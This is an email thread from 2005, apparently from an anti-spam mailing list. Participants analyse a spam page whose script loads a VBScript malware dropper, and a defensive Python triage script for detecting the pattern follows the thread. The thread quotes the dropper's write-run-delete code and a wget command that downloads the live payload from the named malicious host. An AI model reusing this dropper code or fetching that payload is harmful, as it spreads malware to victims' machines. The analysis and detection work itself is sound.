On Thursday, September 1, 2005, 11:59:38 AM, Kenneth Porter wrote:
> --On Thursday, September 01, 2005 11:50 AM -0700 Kenneth Porter 
> <[EMAIL PROTECTED]> wrote:

>> Interesting. The link in that spam leads to a page containing just a news
>> article with the same text, and a "next article" link. But inspection of
>> the page source reveals this bit of JavaScript. Any idea what it does? (I
>> threw some spaces inside the script tags so hopefully OE users on the
>> list won't see this run.) Mozilla's JavaScript console complains about
>> some errors.

> Ok, a bit more investigation shows that it tries to load /w.hta from the 
> same site. This is a VBScript program that attempts to write a "text" file 
> of some binary and then execute it via the MS media player APIs. Smells 
> like an attempt to infect the target with some virus.

> This command can be used to fetch the file for inspection:

> wget -nd -c http://nextermest.com/w.hta

> The critical bits of code:

> Fi="C:\fh4uh.exe"
> set NNM=MSmedia.CreateTextFile(Fi, TRUE)
> NNM.Write(R)
> NNM.Close()
> MSplay.Run (Fi),1,TRUE
> MSmedia.DeleteFile(Fi)
> self.Close

> R contains a binary string; its initialization takes up most of the file.

It's called a malware loader.  Don't load it or it will turn your
computer into a spam sender, virus sender, cracker, DDOSer, or
whatever else the bad guys want it to do.  Visiting sites like
these unprotected is enough to load the malware onto your
computer.

Jeff C.
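
A static triage sketch for the write-run-delete pattern quoted in this thread, added here as an example and not part of the original messages. The function name `triage`, the extension list, and the sample text (the quoted lines with the payload `R` replaced by a placeholder) are constructed for illustration; the script only reads text and never executes it.

```python
import re

# Constructed sample: the lines quoted in the thread, with the binary
# payload string R replaced by a harmless placeholder.
SAMPLE_HTA = r'''
R="<payload placeholder>"
Fi="C:\fh4uh.exe"
set NNM=MSmedia.CreateTextFile(Fi, TRUE)
NNM.Write(R)
NNM.Close()
MSplay.Run (Fi),1,TRUE
MSmedia.DeleteFile(Fi)
self.Close
'''

# name = "string literal" assignments, used to resolve variables such as Fi.
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"', re.I | re.M)
# Method calls whose first argument is a quoted literal or a bare variable.
CALL = re.compile(
    r'\.\s*(CreateTextFile|Run|DeleteFile)\s*\(\s*(?:"([^"]*)"|(\w+))', re.I)
EXEC_EXT = ('.exe', '.scr', '.com', '.pif', '.bat', '.cmd')  # assumed list


def triage(script_text):
    """Report every path the script creates, runs and/or deletes."""
    strings = {n.lower(): v for n, v in ASSIGN.findall(script_text)}
    actions = {}
    for method, literal, var in CALL.findall(script_text):
        # VBScript identifiers are case-insensitive, so resolve in lowercase.
        path = literal or strings.get(var.lower(), var)
        actions.setdefault(path, set()).add(method.lower())
    return [{
        "path": path,
        "actions": sorted(seen),
        "executable_ext": path.lower().endswith(EXEC_EXT),
        # Same path both written and executed: the loader behaviour.
        "drop_and_run": {"createtextfile", "run"} <= seen,
        # Deleting the file afterwards removes the evidence from disk.
        "self_cleaning": "deletefile" in seen,
    } for path, seen in actions.items()]


if __name__ == "__main__":
    for finding in triage(SAMPLE_HTA):
        print(finding)
```

A hit on `drop_and_run` together with `executable_ext` is a reason to quarantine the file for analysis in an isolated environment; heavily obfuscated scripts will evade a regex pass like this one.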
